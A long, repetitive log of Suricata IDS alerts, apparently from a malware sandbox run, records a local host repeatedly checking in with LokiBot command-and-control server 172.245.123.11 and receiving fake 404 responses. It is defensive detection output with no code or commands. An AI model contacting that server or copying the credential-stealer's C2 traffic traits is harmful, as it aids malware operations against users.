                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49821
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49839 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49839 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49920 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49920 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49920 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49727
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49926 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49926 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49926 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49889
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49920 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49719
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49926 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49710
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49920 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49778
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49843 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49926 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49843 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49843 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49915 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49915 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49843 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49804
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49721 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49843 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49940 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49940 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49815
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49934 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49934 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49834 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49940 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49839
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49849 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49849 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49849 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49940 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49915 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49940 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49834 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49934 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49849 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49849 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49877
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49920
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49834 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49934 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49934 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49834 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49834 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49915 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49915 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49932 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49721
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49926
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49932 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49932 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49932 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49932 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49730 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49895 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49895 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49895 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49754 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49754 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49754 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49915
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49843
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49895 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49754 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49730 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49971 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49754 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49895 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49971 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49971 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49971 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49971 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49738 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49790
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49932
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49982 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49982 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49982 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49940
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49738 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49982 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49982 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49964 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49964 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49964 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50015 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49784
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50015 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49964 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49964 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50015 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50006 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49754
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50020 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50015 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49934
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50020 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50020 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50015 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50006 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50000 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50009 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50000 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50006 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50000 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49834
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49982
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50000 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50009 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50000 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49724 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50006 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50020 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50020 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50015
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49738
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50006 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49865 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49865 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49865 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49987 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49865 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49865 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49987 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49987 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49971
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49895
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49730
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49976
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50009 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49865
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50072 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50074 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50077 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50077 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50077 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49849
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50085 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50085 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50085 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50020
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49987 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50077 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50009 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49987 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50067 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50067 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50072 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49969 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49969 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49969 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50080 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50083 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50080 -> 172.245.123.11:80
